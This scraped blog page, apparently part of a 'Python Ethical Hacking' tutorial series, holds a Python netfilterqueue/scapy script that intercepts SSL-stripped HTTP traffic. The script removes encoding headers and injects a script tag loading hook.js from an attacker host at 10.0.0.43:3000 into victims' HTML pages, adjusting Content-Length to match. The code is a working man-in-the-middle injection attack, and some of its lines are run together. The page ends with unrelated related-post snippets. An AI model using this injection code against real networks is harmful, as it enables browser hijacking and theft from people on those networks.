Injecting Code in HTTPS Pages:

#!/usr/bin/env python
import re from netfilterqueue import NetfilterQueue
from scapy.layers.inet import TCP, IP
from scapy.packet import Raw def set_load(packet, load):
packet[Raw].load = load
del packet[IP].len
del packet[IP].chksum
del packet[TCP].chksum
return packet def process_packet(packet):
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):
load = scapy_packet[Raw].load
if scapy_packet[TCP].dport == 10000:
print("[+] Request")
print(scapy_packet.show())
load = re.sub(b"Accept-Encoding:.*?\\r\\n", b"", load)
load = load.replace("HTTP/1.1", "HTTP/1.0")
elif scapy_packet[TCP].sport == 10000:
print("[+] Response")
injection_code = b'<script src="http://10.0.0.43:3000/hook.js"></script>'
load = load.replace(b"</body>", injection_code + b"</body>")
content_length_search = re.search(b"(?:Content-Length:\s)(\d*)", load)
if content_length_search and b"text/html" in load:
print(content_length_search)
content_length = content_length_search.group(1)
new_content_length = int(content_length) + len(injection_code)
load = load.replace(content_length, str(new_content_length).encode()) if load != scapy_packet[Raw].load:
print("Payload")
new_packet = set_load(scapy_packet, load)
print(str(new_packet))
packet.set_payload(str(new_packet).encode()) packet.accept() queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
queue.run()
except KeyboardInterrupt:
print('')

Python Ethical Hacking - Bypass HTTPS(2)的更多相关文章

  1. Python Ethical Hacking - Bypass HTTPS(1)

    HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...

  2. Python Ethical Hacking - MAC Address & How to Change(1)

    MAC ADDRESS Media Access Control Permanent Physical Unique Assigned by manufacturer WHY CHANGE THE M ...

  3. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  4. Python Ethical Hacking - MAC Address & How to Change(3)

    SIMPLE ALGORITHM Goal  -> Check if MAC address was changed. Steps: 1. Execute and read ifconfig. ...

  5. Python Ethical Hacking - The Lab and Needed Software

    The Lab and Needed Software Attacker Machine - Kali Linux https://www.kali.org/ 1. Install the softw ...

  6. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(2)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  7. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(1)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  8. Python Ethical Hacking - DNS Spoofing

    What is DNS Spoofing Sniff the DNSRR packet and show on the terminal. #!/usr/bin/env python from net ...

  9. Python Ethical Hacking - Intercepting and Modifying Packets

    INTERCEPTING & MODIFYING PACKETS Scapy can be used to: Create packets. Analyze packets. Send/rec ...

随机推荐

  1. ca69a.cpp_c++_函数匹配(重载确定)

    /*ca69a.cpp_c++_函数匹配(重载确定)#重载确定的三个步骤1.候选函数2.选择可行函数3.寻找最佳匹配(如果有的话)#含有多个形参的重载确定 void f1();void f1(int) ...

  2. mysql主从同步失败 Relay log read failure: Could not parse relay log event entry

    mysql: [Warning] Using a password on the command line interface can be insecure. Welcome to the MySQ ...

  3. json 文件注释

    json文件注释: "_comment":"this is commets", "jsondata":{ "注释":&q ...

  4. 尚学堂 215 在java中执行JavaScript代码

    package com.bjsxt.test; import java.io.FileReader; import java.net.URL; import java.util.List; impor ...

  5. Quartz.Net系列(九):Trigger之DailyTimeIntervalScheduleBuilder详解

    1.介绍 中文意义就是每日时间间隔计划生成 2.API讲解 (1)WithInterval.WithIntervalInHours.WithIntervalInMinutes.WithInterval ...

  6. Java常用的文档地址

    https://docs.oracle.com/en/ https://docs.oracle.com/en/java/javase/13/   specifications--->langua ...

  7. xxl-job搭建、部署、SpringBoot集成xxl-job

    一.搭建xxl-job 1.下载xxl-job代码 码云地址:https://gitee.com/xuxueli0323/xxl-job gitHub地址:https://github.com/xux ...

  8. Egret游戏大厅制作思路

    Egret游戏大厅制作思路 Egret中,写好的代码最终都被打包到main.js里面,只有库文件会单独生成出来,按需加载. 游戏中有需求,要将一些游戏(或者模块)进行外包,然后从主游戏大厅中进入,那么 ...

  9. Nginx 从入门到放弃(五)

    nginx的rewrite重写 nginx具有将一个路由经过加工变形成另外一个路由的功能,这就叫做重写. 重写中用到的指令 if (条件) {} 设定条件,再进行重写 set # 设定变量 retur ...

  10. Flutter轮播图

    前端开发当中最有意思的就是实现动画特效,Flutter提供的各种动画组件可以方便实现各种动画效果.Flutter中的动画组件主要分为两类: 隐式动画控件:只需设置组件开始值,结束值,执行时间,比如An ...